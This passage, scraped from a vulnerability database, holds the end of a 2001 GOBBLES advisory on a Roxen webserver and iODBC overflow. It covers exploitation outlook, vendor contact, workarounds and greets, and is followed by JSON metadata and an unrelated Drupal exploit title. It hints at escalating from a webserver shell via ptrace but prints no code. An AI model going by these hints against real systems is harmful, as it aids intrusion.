you are more interested\r\nin learning these kind techniques to visit brother rain forest puppy\r\nwebsite at the http://www.wiretrip.net/rfp/ and read about complex methods\r\nof cgi hacking in rain forest puppy papers. \r\n\r\nGOBBLES hope that upon successful exploitation of this bug that an\r\nattacker can at best get only a uid(webserver) shell although many idiotic\r\nwebadmin like to make excessive scripts and programs suid root not\r\nunderstanding the problems introduced there. In any case GOBBLES say that\r\nif it is only a uid(webserver) shell got then you can probably just ptrace\r\nyour way to victory hehehehehehe. . .\r\n\r\nVENDOR NOTIFICATION STATUS\r\n**************************\r\n\r\nGOBBLES have alerted the Roxen team about the bug and not heard any word\r\nback from them about it so GOBBLES is not certain whether or not his\r\nresearch has been read by them yet. GOBBLES have also emailed the iODBC\r\nteam about their programming problems.\r\n\r\n\r\nSUGGESTED WORKAROUNDS\r\n*********************\r\n\r\nGOBBLES suggest to fix this and other similar types of program by:\r\n\r\n1] Limiting size of data passed through CGI applications to helper\r\napplications that may be vulnerable to buffer overflows. Just because a\r\nperl and php script are not vulnerable to bufferoverflow does not mean\r\nthat the helper applications are and GOBBLES wonders why more people do\r\nnot realize the threat of open() and system() type of calls in\r\nnonexploitable code which can be used to exploit exploitable code in other\r\nthings.\r\n\r\n2] Configuring php.ini to disallow the manipulation of any enviornmental\r\nvariables beyond a few which are important because GOBBLES know that some\r\nmust be set by php programs but don't let too many!\r\n\r\n3] Install mySQL instead of MicroSoft database server eliminating the\r\nneeds for the use of the IODBC libraries.\r\n\r\n4] Install Apache instead of Roxen since Apache have a much greater\r\nsecurity history (not in length of problems but greater as in greater\r\nstrongness against bugs).\r\n\r\nGREETS\r\n******\r\n\r\ndianora, tsk, snow, carolyn meinel, john vranesevich, steve gibson, kimble,\r\nknightmare, emmanuel goldstein, box.sk, @stake, securityfocus, sans.org,\r\nblackhat.com, defcon.org, 2600.com, #phrack@efnet, #hackphreak@undernet,\r\nbugtraq (thanks aleph1 and david ahmad for devoting your time to a great\r\nlist), ntbugtraq (russel the love muscle ;D), cert.org, paul vixie, vesselin\r\nbontchev, reese witherspoon, kirsten dunst, katie holmes, aleister crowley,\r\nmanly p hall, franz bardon, dennis ritchie, nietzsche, w. richard stevens,\r\nradiohead, george michael, larry wall, beethoven, francis bacon, bruce\r\nwillis, bruce schneier, alan turing, john von neumann, donald knuth, michael\r\nabrash, robert sedgewick, richard simmons, goverment boy, ralph lauren,\r\nkevin mitnick, david koresh, the violent femmes, Legions of Doom, Quentin\r\nTarantino, JUPES, security.nnov.ru and all our friends and family.\r\n\r\nGOBBLES SECURITY\r\nhttp://www.bugtraq.org\r\n\r\n\r\n", "modified": "2001-11-27T00:00:00", "published": "2001-11-27T00:00:00", "id": "SECURITYVULNS:DOC:2213", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:2213", "title": "New Roxen Webserver Library Issues", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}

Drupal &lt;= 5.2 PHP Zend Hash Vulnerability Exploitation Vector

Description

Exploit for unknown platform in category web applications

Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector